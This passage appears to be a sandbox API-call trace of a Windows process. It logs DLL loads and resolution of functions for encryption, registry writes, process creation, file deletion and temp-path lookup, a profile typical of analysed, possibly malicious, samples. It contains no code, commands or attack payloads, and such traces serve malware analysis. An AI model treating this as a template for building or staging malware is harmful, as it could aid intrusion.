ProcedureAddress=0x20015*=0x7feff5a1a00) returned 0x0 [0140.331] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.331] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.333] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="strstr", Ordinal=0x0, ProcedureAddress=0x20017 | out: ProcedureAddress=0x20017*=0x7feff5a1794) returned 0x0 [0140.333] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.333] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.334] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_wtoi", Ordinal=0x0, ProcedureAddress=0x20016 | out: ProcedureAddress=0x20016*=0x7feff5a36b0) returned 0x0 [0140.334] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.334] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.337] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="rand", Ordinal=0x0, ProcedureAddress=0x20015 | out: ProcedureAddress=0x20015*=0x7feff5a1c60) returned 0x0 [0140.337] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.337] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.339] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="tolower", Ordinal=0x0, ProcedureAddress=0x20018 | out: ProcedureAddress=0x20018*=0x7feff5a43c4) returned 0x0 [0140.339] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.339] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.342] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="memcmp", Ordinal=0x0, ProcedureAddress=0x20017 | out: ProcedureAddress=0x20017*=0x7feff5a1270) returned 0x0 [0140.342] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.342] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.344] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="srand", Ordinal=0x0, ProcedureAddress=0x20016 | out: ProcedureAddress=0x20016*=0x7feff5a4620) returned 0x0 [0140.344] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.344] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.346] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_itow", Ordinal=0x0, ProcedureAddress=0x20016 | out: ProcedureAddress=0x20016*=0x7feff5a4cd4) returned 0x0 [0140.346] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.346] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.347] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_vsnwprintf", Ordinal=0x0, ProcedureAddress=0x2001c | out: ProcedureAddress=0x2001c*=0x7feff5a2f5c) returned 0x0 [0140.347] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.347] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.349] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="??3@YAXPEAX@Z", Ordinal=0x0, ProcedureAddress=0x2001e | out: ProcedureAddress=0x2001e*=0x7feff5a19f0) returned 0x0 [0140.349] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.349] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.351] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="memset", Ordinal=0x0, ProcedureAddress=0x20017 | out: ProcedureAddress=0x20017*=0x7feff5a1000) returned 0x0 [0140.351] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.351] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.352] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="wcsftime", Ordinal=0x0, ProcedureAddress=0x20019 | out: ProcedureAddress=0x20019*=0x7feff60b8c4) returned 0x0 [0140.352] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.352] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.354] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="??_V@YAXPEAX@Z", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x7feff5a431c) returned 0x0 [0140.354] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.354] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.356] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="memcpy", Ordinal=0x0, ProcedureAddress=0x20017 | out: ProcedureAddress=0x20017*=0x7feff5a10e0) returned 0x0 [0140.356] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.356] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.357] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="KERNEL32.dll", BaseAddress=0x20029 | out: BaseAddress=0x20029*=0x77b20000) returned 0x0 [0140.358] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.358] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.359] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="SystemTimeToFileTime", Ordinal=0x0, ProcedureAddress=0x20025 | out: ProcedureAddress=0x20025*=0x77b43560) returned 0x0 [0140.359] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.359] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.361] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetSystemTimeAsFileTime", Ordinal=0x0, ProcedureAddress=0x20028 | out: ProcedureAddress=0x20028*=0x77b33f40) returned 0x0 [0140.361] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.361] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.363] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetCurrentProcessId", Ordinal=0x0, ProcedureAddress=0x20024 | out: ProcedureAddress=0x20024*=0x77b35a50) returned 0x0 [0140.363] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.363] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.365] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetCurrentThreadId", Ordinal=0x0, ProcedureAddress=0x20023 | out: ProcedureAddress=0x20023*=0x77b33ee0) returned 0x0 [0140.365] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.365] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.367] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetTickCount", Ordinal=0x0, ProcedureAddress=0x2001d | out: ProcedureAddress=0x2001d*=0x77b42b00) returned 0x0 [0140.367] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.367] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.368] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="QueryPerformanceCounter", Ordinal=0x0, ProcedureAddress=0x20028 | out: ProcedureAddress=0x20028*=0x77b36500) returned 0x0 [0140.368] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.368] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.370] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="LocalFree", Ordinal=0x0, ProcedureAddress=0x2001a | out: ProcedureAddress=0x2001a*=0x77b347a0) returned 0x0 [0140.370] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.370] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.372] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="TerminateProcess", Ordinal=0x0, ProcedureAddress=0x20021 | out: ProcedureAddress=0x20021*=0x77b6bca0) returned 0x0 [0140.372] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.372] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.374] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetCurrentProcess", Ordinal=0x0, ProcedureAddress=0x20022 | out: ProcedureAddress=0x20022*=0x77b35cf0) returned 0x0 [0140.374] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.374] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.375] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetModuleHandleW", Ordinal=0x0, ProcedureAddress=0x20021 | out: ProcedureAddress=0x20021*=0x77b43730) returned 0x0 [0140.375] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.375] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.420] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="UnhandledExceptionFilter", Ordinal=0x0, ProcedureAddress=0x20029 | out: ProcedureAddress=0x20029*=0x77bb9330) returned 0x0 [0140.420] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.420] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.422] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="RtlVirtualUnwind", Ordinal=0x0, ProcedureAddress=0x20021 | out: ProcedureAddress=0x20021*=0x77b6b5b0) returned 0x0 [0140.422] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.422] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.424] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="RtlLookupFunctionEntry", Ordinal=0x0, ProcedureAddress=0x20027 | out: ProcedureAddress=0x20027*=0x77b6b610) returned 0x0 [0140.424] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.424] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.425] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="RtlCaptureContext", Ordinal=0x0, ProcedureAddress=0x20022 | out: ProcedureAddress=0x20022*=0x77b6b6f0) returned 0x0 [0140.425] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.425] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.427] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="SetUnhandledExceptionFilter", Ordinal=0x0, ProcedureAddress=0x2002c | out: ProcedureAddress=0x2002c*=0x77b39b70) returned 0x0 [0140.427] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.427] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.429] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetStartupInfoW", Ordinal=0x0, ProcedureAddress=0x20020 | out: ProcedureAddress=0x20020*=0x77b38070) returned 0x0 [0140.429] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.429] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.431] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="CloseHandle", Ordinal=0x0, ProcedureAddress=0x2001c | out: ProcedureAddress=0x2001c*=0x77b42f80) returned 0x0 [0140.431] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.431] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.433] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="WriteFile", Ordinal=0x0, ProcedureAddress=0x2001a | out: ProcedureAddress=0x2001a*=0x77b435a0) returned 0x0 [0140.433] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.433] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.434] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="CreateFileA", Ordinal=0x0, ProcedureAddress=0x2001c | out: ProcedureAddress=0x2001c*=0x77b431f0) returned 0x0 [0140.434] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.434] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.437] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="WaitForSingleObject", Ordinal=0x0, ProcedureAddress=0x20024 | out: ProcedureAddress=0x20024*=0x77b42b20) returned 0x0 [0140.437] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.437] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.438] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="CreateProcessA", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x77bb8840) returned 0x0 [0140.438] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.438] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.440] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="DeleteFileA", Ordinal=0x0, ProcedureAddress=0x2001c | out: ProcedureAddress=0x2001c*=0x77b314e0) returned 0x0 [0140.440] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.440] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.443] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetTempPathA", Ordinal=0x0, ProcedureAddress=0x2001d | out: ProcedureAddress=0x2001d*=0x77b82060) returned 0x0 [0140.443] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.443] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.445] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetModuleFileNameW", Ordinal=0x0, ProcedureAddress=0x20023 | out: ProcedureAddress=0x20023*=0x77b37700) returned 0x0 [0140.445] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.445] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.447] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetSystemDirectoryW", Ordinal=0x0, ProcedureAddress=0x20024 | out: ProcedureAddress=0x20024*=0x77b37120) returned 0x0 [0140.447] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.447] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.449] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="Sleep", Ordinal=0x0, ProcedureAddress=0x20016 | out: ProcedureAddress=0x20016*=0x77b42b70) returned 0x0 [0140.449] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.449] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.451] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x77b43690) returned 0x0 [0140.451] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.451] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.453] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="LoadLibraryW", Ordinal=0x0, ProcedureAddress=0x2001d | out: ProcedureAddress=0x2001d*=0x77b36f80) returned 0x0 [0140.453] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.453] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.454] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetLastError", Ordinal=0x0, ProcedureAddress=0x2001d | out: ProcedureAddress=0x2001d*=0x77b42dd0) returned 0x0 [0140.455] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.455] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.522] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetVolumeInformationW", Ordinal=0x0, ProcedureAddress=0x20026 | out: ProcedureAddress=0x20026*=0x77b42150) returned 0x0 [0140.522] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.522] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.524] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetWindowsDirectoryW", Ordinal=0x0, ProcedureAddress=0x20025 | out: ProcedureAddress=0x20025*=0x77b282b0) returned 0x0 [0140.524] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.524] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.525] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="CreateProcessW", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x77b41bb0) returned 0x0 [0140.526] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.526] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.527] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0x2001d | out: ProcedureAddress=0x2001d*=0x77b37070) returned 0x0 [0140.527] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.527] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.529] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="lstrlenW", Ordinal=0x0, ProcedureAddress=0x20019 | out: ProcedureAddress=0x20019*=0x77b33ec0) returned 0x0 [0140.529] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.529] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.532] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetFullPathNameW", Ordinal=0x0, ProcedureAddress=0x20021 | out: ProcedureAddress=0x20021*=0x77b376e0) returned 0x0 [0140.532] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.532] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.534] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetSystemTime", Ordinal=0x0, ProcedureAddress=0x2001e | out: ProcedureAddress=0x2001e*=0x77b43540) returned 0x0 [0140.534] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.534] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.538] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="USER32.dll", BaseAddress=0x20025 | out: BaseAddress=0x20025*=0x77a20000) returned 0x0 [0140.551] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.552] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.553] LdrGetProcedureAddress (in: BaseAddress=0x77a20000, Name="wsprintfW", Ordinal=0x0, ProcedureAddress=0x2001a | out: ProcedureAddress=0x2001a*=0x77a4099c) returned 0x0 [0140.553] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.553] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.555] LdrGetProcedureAddress (in: BaseAddress=0x77a20000, Name="wsprintfA", Ordinal=0x0, ProcedureAddress=0x2001a | out: ProcedureAddress=0x2001a*=0x77a9bae8) returned 0x0 [0140.555] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.555] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.557] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ADVAPI32.dll", BaseAddress=0x20029 | out: BaseAddress=0x20029*=0x7feff0e0000) returned 0x0 [0140.561] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.561] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.563] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="RegQueryValueExW", Ordinal=0x0, ProcedureAddress=0x20021 | out: ProcedureAddress=0x20021*=0x7feff0fc2d0) returned 0x0 [0140.563] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.563] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.566] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="RegOpenKeyW", Ordinal=0x0, ProcedureAddress=0x2001c | out: ProcedureAddress=0x2001c*=0x7feff0f3280) returned 0x0 [0140.566] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.566] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.568] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="RegSetValueExW", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x7feff0f1ed0) returned 0x0 [0140.568] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.568] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.570] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="CryptDecrypt", Ordinal=0x0, ProcedureAddress=0x2001d | out: ProcedureAddress=0x2001d*=0x7feff11b6d0) returned 0x0 [0140.570] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.571] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.573] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="CryptSetKeyParam", Ordinal=0x0, ProcedureAddress=0x20021 | out: ProcedureAddress=0x20021*=0x7feff11b508) returned 0x0 [0140.573] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.573] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.575] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="CryptDestroyKey", Ordinal=0x0, ProcedureAddress=0x20020 | out: ProcedureAddress=0x20020*=0x7feff0eafa0) returned 0x0 [0140.575] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.575] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.776] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="CryptEncrypt", Ordinal=0x0, ProcedureAddress=0x2001d | out: ProcedureAddress=0x2001d*=0x7feff11b650) returned 0x0 [0140.776] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.776] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.778] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="CryptImportKey", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x7feff0eaf6c) returned 0x0 [0140.779] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.779] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.781] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="CryptAcquireContextA", Ordinal=0x0, ProcedureAddress=0x20025 | out: ProcedureAddress=0x20025*=0x7feff0e8180) returned 0x0 [0140.781] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.781] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.783] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="CryptReleaseContext", Ordinal=0x0, ProcedureAddress=0x20024 | out: ProcedureAddress=0x20024*=0x7feff0edd10) returned 0x0 [0140.783] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.783] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.786] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="RegCreateKeyExW", Ordinal=0x0, ProcedureAddress=0x20020 | out: ProcedureAddress=0x20020*=0x7feff0fb520) returned 0x0 [0140.786] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.786] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.788] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="RegCloseKey", Ordinal=0x0, ProcedureAddress=0x2001c | out: ProcedureAddress=0x2001c*=0x7feff100710) returned 0x0 [0140.788] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.788] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.791] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="SHELL32.dll", BaseAddress=0x20027 | out: BaseAddress=0x20027*=0x7fefdfd0000) returned 0x0 [0140.797] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.797] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.799] LdrGetProcedureAddress (in: BaseAddress=0x7fefdfd0000, Name="SHGetFolderPathW", Ordinal=0x0, ProcedureAddress=0x20021 | out: ProcedureAddress=0x20021*=0x7fefe053ba4) returned 0x0 [0140.799] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.799] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.801] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ole32.dll", BaseAddress=0x20023 | out: BaseAddress=0x20023*=0x7feffa40000) returned 0x0 [0140.804] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.804] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.806] LdrGetProcedureAddress (in: BaseAddress=0x7feffa40000, Name="CoInitializeEx", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x7feffa62a30) returned 0x0 [0140.807] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.807] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.809] LdrGetProcedureAddress (in: BaseAddress=0x7feffa40000, Name="CoInitializeSecurity", Ordinal=0x0, ProcedureAddress=0x20025 | out: ProcedureAddress=0x20025*=0x7feffa58220) returned 0x0 [0140.809] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.809] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.811] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="OLEAUT32.dll", BaseAddress=0x20029 | out: BaseAddress=0x20029*=0x7feffd80000) returned 0x0 [0140.813] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.813] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.815] LdrGetProcedureAddress (in: BaseAddress=0x7feffd80000, Name=0x0, Ordinal=0x2, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7feffd83480) returned 0x0 [0140.815] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.815] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.817] LdrGetProcedureAddress (in: BaseAddress=0x7feffd80000, Name=0x0, Ordinal=0x6, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7feffd81320) returned 0x0 [0140.817] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.817] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.819] LdrGetProcedureAddress (in: 